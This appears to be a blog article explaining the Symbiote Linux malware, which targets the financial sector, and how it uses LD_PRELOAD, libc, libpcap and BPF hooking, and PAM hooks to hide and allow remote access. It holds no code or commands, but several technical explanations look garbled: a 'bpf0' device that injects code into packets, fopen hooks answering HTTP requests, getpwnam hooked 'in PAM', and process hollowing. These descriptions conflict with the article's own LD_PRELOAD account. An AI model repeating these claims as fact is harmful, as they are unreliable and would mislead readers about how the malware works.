Symbiote: A Nearly Undetectable Linux Malware
A Stealthy Malware Triumphing In The New Era Of Cyber Threats
Regular pc users have to worry about trojans, phishing scams, and other bad stuff, but it looks like folks working in the financial sector are facing a new sort of threat. It’s called Symbiote, and it’s a Linux-based malware specifically targeting the financial sector. Even scarier is the fact that security researchers say the malware could be almost impossible to detect.
As per a blog post by BlackBerry Research, the malware was first revealed in November 2021. Symbiote’s strategy of infecting running processes rather than a standalone executable file makes it different from other Linux malware.
Symbiote masks its visibility by hooking libc and libpcap functions. It then uses these functions to hide its process from the operating system. The malware uses several C&C servers; however, all of them differ in port numbers and protocols used for communication.
Symbiote malware uses shared object libraries (SOs)
The Symbiote malware is a system-wide infection that’s able to stay hidden from administrator privileges. It’s also able to bypass antivirus detection.
The malware uses a directive called LD_PRELOAD to hijack security-related functions in the operating system and inject malicious code, which allows it to gain priority against other shared objects.
The Symbiote malware uses shared object libraries (SOs) that are loaded before any others, which means they have higher priority than other libraries — even libraries used by antivirus products.
The SO library for Symbiote can for instance be “libc6-dbg”, which makes it hard for administrators to detect malware with the same name on their systems. This allows the malware to hide in various places on the system without being detected by antivirus products.
Dynamic Linker Hijacking
The attacking method that Symbiote uses to infect a machine is called Dynamic Linker Hijacking. The dynamic linker is the part of an operating system that loads shared libraries into a process’ address space and resolves symbols in those libraries. Symbiote hijacks this process by inserting malicious code into the dynamic linker’s shared library cache. The malware then waits for a vulnerable executable to be run so it can inject itself into the process’ address space and begin executing malicious code.
Symbiote is capable of masking network activity
The first method involves hooking fopen and fopen64. When a process attempts to open a file that is known to contain network traffic, such as an HTTP request, Symbiote will intercept the request and return its own response. This allows the malware to hide its activities from security researchers.
The second method used by Symbiote to hide its network activity is by seizing any injected packet filtering bytecode. Many malware developers have implemented their own packet filtering modules using the extended Berkeley Packet Filter (eBPF) capability provided by the Linux kernel, which enables packet filtering in user space. This is where Symbiote comes in. It contains a module that injects itself into the process that runs eBPF bytecode (sk_buff), then modifies the eBPF bytecode before execution to add an additional filter rule for itself. This way, when someone tries to analyze the network traffic generated by the malware, they’ll only see legitimate packets from other applications or processes.
Third, the malware hides its network traffic by hooking libpcap functions to filter out UDP traffic to domain names it has in a list.
The BPF (Berkeley Packet Filter) hooking technique
The BPF hooking technique is a powerful tool that can be used to bypass many security sandboxes. BPF stands for Berkeley Packet Filter and it’s an extension to the Linux kernel which allows you to create virtual network interfaces that can intercept any network packets and manipulate them before passing them on to their final destination.
The BPF hooking technique works by first creating a BPF device called “bpf0” (the first device). This device is then used as a filter driver for all traffic going through the system. All packets are redirected to this device when they go through the kernel stack. The BPF hooking technique uses this feature to redirect some packets before they reach their final destination and injects malicious code into them at runtime.
BPF was originally intended as a tool for network filtering and traffic analysis, but it can also be used for malicious purposes. The ability to monitor and modify network traffic has led to the rise of BPF-based malware, which often uses BPF hooks to capture sensitive information from user processes, such as passwords and session cookies.
Attackers can access a Linux machine remotely by hooking a few Linux Pluggable Authentication Module (PAM) functions
The Linux Pluggable Authentication Module (PAM) is a library that provides authentication services for applications. It’s an extensible system that allows applications to plug in their own custom routines for performing various actions related to authentication, such as verifying the identity of users.
Symbiote malware targets PAM to perform privilege escalation attacks on Linux machines. Attackers can access a Linux machine remotely by hooking a few PAM functions. The malware decrypts itself into memory and hooks the getpwnam() function in PAM to execute malicious code whenever a user tries to log in.
The malware uses a technique called “Process Hollowing” to achieve this. This process involves spawning another process in a suspended state and overwriting its memory with malicious code that is executed when the legitimate process resumes execution. This technique is often used by banking trojans to evade detection by anti-virus software because it causes minimal changes to the file structure of an infected system and makes it difficult for forensic investigators to detect suspicious activity on compromised computers.
Detecting Symbiote
Although the malware is nearly impossible to detect, researchers suggest that network telemetry can help spot anomalies and as a preventive best practice, it’s advised to link security tools such as EDR with antivirus software so that both systems can share information about threats detected on each endpoint.
Conclusion
While computers are becoming increasingly secure, malicious actors continue to search for new and innovative ways to compromise systems. Symbiote malware is an example of such a threat. Symbiote can be placed on virtually any Linux machine and allow a nefarious actor to gain control. It is difficult to detect because it cleverly hides its activities and uses certain tactics to evade detection.
Wide-scale adoption of open source systems has made cyber-attacks more insidious and arduous. Moreover, efficient threat detection, mitigation, and response mechanisms are required to avoid attacks with code execution capabilities that may disrupt business operations of organizations. Cyber-security professionals must find ways to deal with this new challenge by staying a step ahead of attackers and evading their advanced malware tactics.
